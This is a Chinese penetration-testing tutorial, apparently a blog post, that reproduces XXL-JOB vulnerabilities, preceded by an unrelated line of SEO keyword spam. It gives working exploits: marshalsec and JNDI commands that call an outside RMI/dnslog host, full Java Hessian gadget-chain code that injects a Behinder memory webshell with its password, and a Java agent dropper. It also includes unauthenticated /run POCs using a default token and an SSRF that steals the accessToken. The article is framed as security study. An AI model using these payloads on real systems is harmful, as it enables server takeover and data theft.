目前专业做水果的网站有哪些,wordpress 附件预览,谢岗镇网站仿做,百度竞价排名及自动竞价功能一、前言
在当今的数字化时代#xff0c;任务调度平台对于企业级应用来说至关重要。它们负责自动化和协调各种时间敏感或周期性的任务#xff0c;确保业务流程的顺畅运行。XXL-JOB作为一款流行的分布式任务调度平台#xff0c;因其强大的功能和易用性#xff0c;被广泛部署…一、前言
在当今的数字化时代任务调度平台对于企业级应用来说至关重要。它们负责自动化和协调各种时间敏感或周期性的任务确保业务流程的顺畅运行。XXL-JOB作为一款流行的分布式任务调度平台因其强大的功能和易用性被广泛部署在各种规模的系统中。然而随着其应用的普及安全研究人员开始关注这些系统可能存在的潜在风险一个漏洞的发现可能会导致数据泄露、服务中断甚至整个系统被控制。对于渗透测试人员来说学习XXL-JOB的漏洞原理能够在一定程度上提升渗透能力。 本篇文章旨在详细介绍XXL-JOB平台中已被发现的一些关键漏洞以及这些漏洞可能被利用的方式。
二、XXL-JOB简介
2.1 概述
XXL-JOB是一个开源的分布式任务调度平台设计宗旨是实现任务的快速开发、简易学习和轻量级部署同时具备良好的扩展性。该平台由调度中心和管理执行器的两部分组成它们通过网络进行通信实现任务的调度和执行。调度中心负责任务的发起和调度策略的配置而执行器则负责接收任务请求并执行具体的业务逻辑。 通俗的来说XXL-JOB就像一个超级强大的闹钟但它不仅仅能设定固定的时间响铃还能根据复杂的规则和条件来触发任务。想象一下你有一个任务需要每天早上8点执行另外一个任务需要在每月的第1天晚上12点执行还有任务是基于某些特定事件触发的比如数据库中的数据达到一定量时。
2.2 特点
XXL-JOB就像一个智能助手它可以帮你设定这些任务并且确保它们在正确的时间得到执行。它有以下几个关键特点 容器化提供官方docker镜像并实时更新推送dockerhub进一步实现产品开箱即用。 脚本任务支持以GLUE模式开发和运行脚本任务包括Shell、Python、NodeJS、PHP、PowerShell等类型脚本。 动态支持动态修改任务状态、启动/停止任务以及终止运行中任务即时生效。 Rolling实时日志支持在线查看调度结果并且支持以Rolling方式实时查看执行器输出的完整的执行日志。 三、XXL-JOB搭建
搭建可参考官方文档
分布式任务调度平台XXL-JOB
源码结构
Plain Text
xxl-job-admin调度中心
xxl-job-core公共依赖
xxl-job-executor-samples执行器Sample示例选择合适的版本执行器可直接使用也可以参考其并将现有项目改造成执行器 xxl-job-executor-sample-springbootSpringboot版本通过Springboot管理执行器推荐这种方式 xxl-job-executor-sample-frameless无框架版本
这里我采用docker进行搭建可参考基于docker的分布式任务调度系统xxl-job搭建注意这里我们搭建有漏洞的版本我这里搭建的是2.0.2版本。
docker启动涉及到的命令如下
Bash
# 安装mysql
docker pull mysql# 启动mysql
docker run -e MYSQL_ROOT_PASSWORD123456 -p 3306:3306 -v /opt:/opt mysql --character-set-serverutf8mb4 --collation-serverutf8mb4_unicode_ci# 修改密码
ALTER USER root% IDENTIFIED WITH mysql_native_password BY 123456;# 刷新权限
flush privileges;# 创建数据库
CREATE database if NOT EXISTS xxl_job default character set utf8 collate utf8_general_ci;# 导入sql文件
source /opt/xxl-job-2.4.0/doc/db/tables_xxl_job.sql;# 下载镜像
docker pull xuxueli/xxl-job-admin:2.0.2# 启动镜像
docker run -e PARAMS--spring.datasource.urljdbc:mysql://192.168.2.198:3306/xxl_job?UnicodetruecharacterEncodingUTF-8 --spring.datasource.usernameroot --spring.datasource.password123456 -p 8080:8080 -v /tmp:/data/applogs --name xxl-job-admin xuxueli/xxl-job-admin:2.0.2
搭建成功显示如下 访问 http://ip:port/xxl-job-admin/ 四、XXL-JOB漏洞复现与分析
4.1 默认口令 4.2 Hessian反序列化
4.2.1 漏洞复现 4.2.1.1 出网利用 影响版本XXL-JOB 2.0.2 漏洞原理/api接口存在Hessian2反序列化漏洞 漏洞复现 访问/api接口存在如下报错响应则存在漏洞。 这里测试使用的是jdk11所以需要bypass高版本的限制这里启动JNDI服务
Bash
# 工具地址https://github.com/welk1n/JNDI-Injection-Exploit可bypass jdk高本版限制
java -jar JNDI-Injection-Exploit-1.0-welk1n.jar -A 0.0.0.0 -C ping xmm0yh.dnslog.cn 生成恶意序列化数据
Bash
# 工具地址https://github.com/mbechler/marshalsec有Hessian的利用链
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian2 SpringAbstractBeanFactoryPointcutAdvisor rmi://x.x.x.x:1099/kt17tn 1.ser burp发送有问题这里使用curl发送
Bash
curl -XPOST --data-binary 1.ser http://192.168.2.132:8080/xxl-job-admin/api -H Content-Type: x-application/hessian
命令执行成功
4.2.1.2 不出网利用
通过jdk原生 SwingLazyValue利用链可以达到反射调用静态方法。测试jdk1.8成功jdk9版本开始删除了rt.jar下面测试注入内存马。
方式一defineClass加载字节码
调用Unsafe#defineClass方法来加载字节码实现内存马注入使用JMG工具GitHub - pen4uin/java-memshell-generator: 一款支持自定义的 Java 内存马生成工具A customizable Java in-memory webshell generation tool.生成内存马代码参考探寻Hessian JDK原生反序列化不出网的任意代码执行利用链 – Whwlsfbs Tech Blog
代码需要修改的地方有 bcode的值为生成的BASE64格式的内存马 注入的类名
Java
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import com.caucho.hessian.io.SerializerFactory;
import com.sun.org.apache.xml.internal.security.exceptions.Base64DecodingException;
import com.sun.org.apache.xml.internal.security.utils.Base64;
import sun.misc.Unsafe;
import sun.reflect.misc.MethodUtil;
import sun.swing.SwingLazyValue;import javax.swing.;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.security.ProtectionDomain;
import java.util.HashMap;
import java.util.Hashtable;public class hessian_demo_main {static SerializerFactory serializerFactory new SerializerFactory();static byte[] bcode;static {try {// 修改下面bcode为实际生成的BASE64格式的内存马bcode Base64.decode(yv66vg...AAAAAgCi);} catch (Base64DecodingException e) {throw new RuntimeException(e);}}public static void main(String[] args) throws Exception {serializerFactory.setAllowNonSerializable(true);Method invoke MethodUtil.class.getMethod(invoke, Method.class, Object.class, Object[].class);Method defineClass Unsafe.class.getDeclaredMethod(defineClass, String.class, byte[].class, int.class, int.class, ClassLoader.class, ProtectionDomain.class);Field f Unsafe.class.getDeclaredField(theUnsafe);f.setAccessible(true);Object unsafe f.get(null);// 修改下面HttpClientUtil为实际生成内存马的类名Object[] ags new Object[]{invoke, new Object(), new Object[]{defineClass, unsafe, new Object[]{HttpClientUtil, bcode, 0, bcode.length, null, null}}};// 修改下面HttpClientUtil为实际生成内存马的类名SwingLazyValue swingLazyValue1 new SwingLazyValue(HttpClientUtil, null, new Object[0]);SwingLazyValue swingLazyValue new SwingLazyValue(sun.reflect.misc.MethodUtil, invoke, ags);Object[] keyValueList new Object[]{abc, swingLazyValue};Object[] keyValueList1 new Object[]{ccc, swingLazyValue1};UIDefaults uiDefaults1 new UIDefaults(keyValueList);UIDefaults uiDefaults2 new UIDefaults(keyValueList);UIDefaults uiDefaults3 new UIDefaults(keyValueList1);UIDefaults uiDefaults4 new UIDefaults(keyValueList1);HashtableObject, Object hashtable1 new Hashtable();HashtableObject, Object hashtable2 new Hashtable();HashtableObject, Object hashtable3 new Hashtable();HashtableObject, Object hashtable4 new Hashtable();hashtable1.put(a, uiDefaults1);hashtable2.put(a, uiDefaults2);hashtable3.put(b, uiDefaults3);hashtable4.put(b, uiDefaults4);serObj(hashtable1, hashtable2, hashtable3, hashtable4);readObj();}static void serObj(Object hashtable1, Object hashtable2, Object hashtable3, Object hashtable4) throws Exception {HashMapObject, Object s new HashMap();Reflections.setFieldValue(s, size, 4);Class? nodeC;try {
* nodeC Class.forName(java.util.HashMap**$Node);} catch (ClassNotFoundException e) {nodeC Class.forName(java.util.HashMap$*Entry);}Constructor? nodeCons nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl Array.newInstance(nodeC, 4);Array.set(tbl, 0, nodeCons.newInstance(0, hashtable1, hashtable1, null));Array.set(tbl, 1, nodeCons.newInstance(0, hashtable2, hashtable2, null));Array.set(tbl, 2, nodeCons.newInstance(0, hashtable3, hashtable3, null));Array.set(tbl, 3, nodeCons.newInstance(0, hashtable4, hashtable4, null));Reflections.setFieldValue(s, table, tbl);Hessian2Output hessian2Output new Hessian2Output(new FileOutputStream(hessian.ser));hessian2Output.setSerializerFactory(serializerFactory);hessian2Output.writeObject(s);hessian2Output.close();}static void readObj() throws Exception {Hessian2Input hessian2Input new Hessian2Input(new FileInputStream(hessian.ser));hessian2Input.readObject();}
} 再通过curl发包即可
Bash
curl -XPOST --data-binary hessian.ser http://192.168.2.132:8080/xxl-job-admin/api -H Content-Type: x-application/hessian
这里注入的是冰蝎listener内存马
密码: Igzafarqnx
请求路径: /
请求头: Referer: Vhmeexb 方法二XSLT触发defineClass加载字节码
代码参考SwingLazyValue在WebShell下的利用 -
修改两个地方 base64_payload为要注入的BASE64格式的内存马 class_name为注入的类名
Java
import com.caucho.hessian.io.Hessian2Input;
import com.caucho.hessian.io.Hessian2Output;
import sun.swing.SwingLazyValue;import javax.swing.*;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Hashtable;import static com.qt.test.hessian_demo_main.serializerFactory;public class hessian_demo_two {public static void main(String[] args) throws Exception {String xsltTemplate xsl:stylesheet version\1.0\ xmlns:xsl\http://www.w3.org/1999/XSL/Transform\\n xmlns:b64\http://xml.apache.org/xalan/java/sun.misc.BASE64Decoder\\n xmlns:ob\http://xml.apache.org/xalan/java/java.lang.Object\\n xmlns:th\http://xml.apache.org/xalan/java/java.lang.Thread\\n xmlns:ru\http://xml.apache.org/xalan/java/org.springframework.cglib.core.ReflectUtils\\n \n xsl:template match\/\\n xsl:variable name\bs\ select\b64:decodeBuffer(b64:new(),base64_payload)\/\n xsl:variable name\cl\ select\th:getContextClassLoader(th:currentThread())\/\n xsl:variable name\rce\ select\ru:defineClass(class_name,$bs,$cl)\/\n xsl:value-of select\$rce\/\n /xsl:template\n /xsl:stylesheet;String base64Code yv66vg...AAAAAgCi;serializerFactory.setAllowNonSerializable(true);String xslt xsltTemplate.replace(base64_payload, base64Code).replace(class_name, HttpClientUtil);SwingLazyValue value1 new SwingLazyValue(com.sun.org.apache.xml.internal.security.utils.JavaUtils, writeBytesToFilename, new Object[]{E:/SecCode/Test/Test/xslt_temp, xslt.getBytes()});SwingLazyValue value2 new SwingLazyValue(com.sun.org.apache.xalan.internal.xslt.Process, _main, new Object[]{new String[]{-XT, -XSL, file:///E:/SecCode/Test/Test/xslt_temp}});Object[] keyValueList new Object[]{abc, value1};Object[] keyValueList1 new Object[]{ccc, value2};UIDefaults uiDefaults1 new UIDefaults(keyValueList);UIDefaults uiDefaults2 new UIDefaults(keyValueList);UIDefaults uiDefaults3 new UIDefaults(keyValueList1);UIDefaults uiDefaults4 new UIDefaults(keyValueList1);HashtableObject, Object hashtable1 new Hashtable();HashtableObject, Object hashtable2 new Hashtable();HashtableObject, Object hashtable3 new Hashtable();HashtableObject, Object hashtable4 new Hashtable();hashtable1.put(a, uiDefaults1);hashtable2.put(a, uiDefaults2);hashtable3.put(b, uiDefaults3);hashtable4.put(b, uiDefaults4);serObj(hashtable1, hashtable2, hashtable3, hashtable4);readObj();}static void serObj(Object hashtable1, Object hashtable2, Object hashtable3, Object hashtable4) throws Exception {HashMapObject, Object s new HashMap();Reflections.setFieldValue(s, size, 4);Class? nodeC;try {nodeC Class.forName(java.util.HashMap$Node);} catch (ClassNotFoundException e) {nodeC Class.forName(java.util.HashMap$Entry);}Constructor? nodeCons nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);nodeCons.setAccessible(true);Object tbl Array.newInstance(nodeC, 4);Array.set(tbl, 0, nodeCons.newInstance(0, hashtable1, hashtable1, null));Array.set(tbl, 1, nodeCons.newInstance(0, hashtable2, hashtable2, null));Array.set(tbl, 2, nodeCons.newInstance(0, hashtable3, hashtable3, null));Array.set(tbl, 3, nodeCons.newInstance(0, hashtable4, hashtable4, null));Reflections.setFieldValue(s, table, tbl);Hessian2Output hessian2Output new Hessian2Output(new FileOutputStream(hessian.ser));hessian2Output.setSerializerFactory(serializerFactory);hessian2Output.writeObject(s);hessian2Output.close();}static void readObj() throws Exception {Hessian2Input hessian2Input new Hessian2Input(new FileInputStream(hessian.ser));hessian2Input.readObject();}
}
环境jdk1.8这里注入的是冰蝎listener内存马
密码: Igzafarqnx
请求路径: /*
请求头: Referer: Vhmeexb 4.2.2 漏洞分析
找到触发/api路由的方法位于com.xxl.job.admin.controller.JobApiController#api。
进入com.xxl.job.admin.core.schedule.XxlJobDynamicScheduler#invokeAdminService。
进入com.xxl.rpc.remoting.net.impl.servlet.server.ServletServerHandler#handle。
进入com.xxl.rpc.remoting.net.impl.servlet.server.ServletServerHandler#parseRequest其中readBytes(request)方法获取请求体的数据然后传入com.xxl.rpc.serialize.impl.HessianSerializer#deserialize。
下面就是Hessian2反序列化的流程 4.3 后台命令执行
4.3.1 漏洞复现
测试环境2.1.22.0.2版本powershell脚本测试执行失败需要启动执行器新增一个powershell脚本任务
添加完成后编辑GLUE插入要执行的命令。
点击执行一次然后点击查询调度日志执行命令的结果在日志中。
4.3.1.1 出网利用
一般考虑反弹shell或者上线cs。
4.3.1.2 不出网利用
考虑注入一个java agent内存马因为没有上传点需要写一个agent马进去测试环境jdk1.8先准备好agent内存马然后将其base64编码后分割再拼接
Java
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.util.Base64;public class Base64FileSplit {public static void main(String[] args) {File file new File(E:\\Agent-1.0.jar);FileOutputStream fos null;try {fos new FileOutputStream(split_base64_output.txt);byte[] buffer new byte[1000]; // 缓冲区大小为1000个字符int bytesRead;// 读取文件并转换为Base64字符串FileInputStream fis new FileInputStream(file);byte[] fileContent new byte[(int) file.length()];fis.read(fileContent);String base64String Base64.getEncoder().encodeToString(fileContent);// 分割Base64字符串并写入到文件for (int i 0; i base64String.length(); i 1000) {String line sb.append(\ base64String.substring(i, Math.min(i 1000, base64String.length())) \);;fos.write(line.getBytes());fos.write(\n.getBytes());}System.out.println(Base64字符串已成功分割并写入到文件中.);} catch (IOException e) {e.printStackTrace();} finally {if (fos ! null) {try {fos.close();} catch (IOException e) {e.printStackTrace();}}}}
}
生成拼接的字符串。 添加一个java脚本的任务再编辑代码。
修改代码为如下
Java
package com.xxl.job.service.handler;import com.xxl.job.core.log.XxlJobLogger;
import com.xxl.job.core.biz.model.ReturnT;
import com.xxl.job.core.handler.IJobHandler;
import java.io.*;
import java.util.Base64;public class DemoGlueJobHandler extends IJobHandler {Overridepublic ReturnTString execute(String param) throws Exception {saveJarAndEx();return ReturnT.SUCCESS;}public static void saveJarAndEx() {StringBuilder sb new StringBuilder();// 拼接的base64字符串sb.append(UEsDBAoAAAAAANwVPlgAAAAAAAAA...);..........sb.append(...DQAAAA);// Base64解码String base64String sb.toString();byte[] decodedBytes Base64.getDecoder().decode(base64String);// 保存agent jarFile jarFile new File(test1.jar);try {FileOutputStream fileOutputStream new FileOutputStream(jarFile);fileOutputStream.write(decodedBytes);fileOutputStream.close();// 执行jarProcessBuilder processBuilder new ProcessBuilder(java, -jar, test1.jar);Process process processBuilder.start();InputStream inputStream process.getInputStream();BufferedReader reader new BufferedReader(new InputStreamReader(inputStream));String line;while ((line reader.readLine()) ! null) {System.out.println(line);}} catch (FileNotFoundException e) {throw new RuntimeException(e);} catch (IOException e) {throw new RuntimeException(e);}}
执行任务就可在控制台中看到注入成功。
冰蝎连接 4.3.2 漏洞分析
执行任务的路由为/jobinfo/trigger对应的源码为com.xxl.job.admin.controller.JobInfoController#triggerJob。
调用com.xxl.job.admin.core.trigger.XxlJobTrigger#trigger。
调用processTrigger方法
调用com.xxl.job.admin.core.trigger.XxlJobTrigger#runExecutor。
这里获取执行器9999端口启动的并委托ExecutorBiz执行run方法。
反射调用run方法。
com.xxl.job.core.biz.impl.ExecutorBizImpl#run方法判断glueTypeEnum的值这里传入的是powershell进入到如下if初始化一个ScriptJobHandler并放入到队列中。
接着通过任务线程执行handlercom.xxl.job.core.handler.impl.ScriptJobHandler#execute在execute方法中会将要执行的powershell脚本内容保存到一个后缀psl的文件中并传入ScriptUtil#execToFile方法中。
在com.xxl.job.core.util.ScriptUtil#execToFile中通过Runtime exec执行powershell文件。
其他执行方式如shelljava同理根据传入的glueTypeEnum获取到对应的JobHandler。 4.4 Executor未授权命令执行
4.4.1 漏洞复现
影响版本XXL-JOB 2.2.0
漏洞原理/run接口触发执行器执行脚本acessToken为空绕过鉴权。
漏洞复现
Executor默认是监听在9999端口和后台执行任务导致的命令执行一样只不过这里直接未授权请求Executor去触发脚本执行测试版本2.2.0通过powershell执行。
POC
Java
POST /run HTTP/1.1
Host: 192.168.2.132:9999
Content-Type: application/json
Content-Length: 311{
jobId:1,
executorHandler: demoJobHandler,
executorParams: demoJobHandler,
executorBlockStrategy: COVER_EARLY,
executorTimeout: 0,
logId: 1,
logDateTime: 1,
glueType: GLUE_POWERSHELL,
glueSource: calc.exe,
glueUpdatetime: 1,
broadcastIndex: 0,
broadcastTotal: 0
}
4.4.2 漏洞分析
在com.xxl.job.core.server.EmbedServer.EmbedHttpServerHandler#process方法中校验请求包中的accessToken由于在 2.2.0时accessToken值默认为空所以accessToken.trim().length() 0为false即绕过认证。
和后台通过执行任务造成的命令执行原理一样。
4.5 默认accessToken身份绕过
4.5.1 漏洞复现
影响版本XXL-JOB 2.4.0
漏洞原理用于调度通讯的 accessToken 为默认值default_token。
漏洞复现
添加请求头直接通过/run接口触发命令执行
POC
Java
POST /run HTTP/1.1
Host: 192.168.2.132:9999
Content-Type: application/json
XXL-JOB-ACCESS-TOKEN: default_token
Content-Length: 311{
jobId:1,
executorHandler: demoJobHandler,
executorParams: demoJobHandler,
executorBlockStrategy: COVER_EARLY,
executorTimeout: 0,
logId: 1,
logDateTime: 1,
glueType: GLUE_POWERSHELL,
glueSource: calc.exe,
glueUpdatetime: 1,
broadcastIndex: 0,
broadcastTotal: 0
}
4.5.2 漏洞分析
token校验的时候获取请求头的XXL-JOB-ACCESS-TOKEN的值和配置文件的默认accessToken 值default_token进行对比。
4.6 后台SSRF
4.6.1 漏洞复现
影响版本XXL-JOB 2.3.1
漏洞原理查看执行日志/joblog/logDetailCat接口时会携带accessToken向执行器地址发送请求可以通过低权限用户发送日志查看的数据包获取accessToken再利用accessToken去触发/run接口的命令执行。
漏洞复现
修改executorAddress
通过nc监听请求包可在请求头中获取accessToken。
4.6.2 漏洞分析
在获取执行器的代码com.xxl.job.admin.core.scheduler.XxlJobScheduler#getExecutorBiz方法中会将传入的address和配置文件中的accessToken实例化返回executorBiz供后续发起请求。
在2.4.0版本中直接获取执行器的地址无法利用。
参考
探寻Hessian JDK原生反序列化不出网的任意代码执行利用链 – Whwlsfbs Tech Blog
SwingLazyValue在WebShell下的利用 -
基于docker的分布式任务调度系统xxl-job搭建_xxl-job docker-CSDN博客
